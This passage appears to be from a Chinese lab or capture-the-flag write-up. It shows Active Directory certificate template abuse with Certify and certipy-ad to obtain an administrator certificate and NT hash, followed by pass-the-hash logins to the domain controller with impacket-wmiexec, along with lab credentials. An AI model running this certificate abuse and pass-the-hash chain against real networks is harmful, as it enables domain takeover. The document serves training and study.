                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.1629693
1
2
CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name                         : XR Manage

这个可以打

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -t
emplate 'XR Manager'  -upn administrator@xiaorang.lab
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'administrator@xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@xiaorang.lab
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

得到了administrator的哈希了,拿下域控了,直接登录这台主机和域控拿flag即可

1
2
3
4
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-wmiexec  -hashes aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-wmiexec  --hashes aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80 administrator@172.22.9.26
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!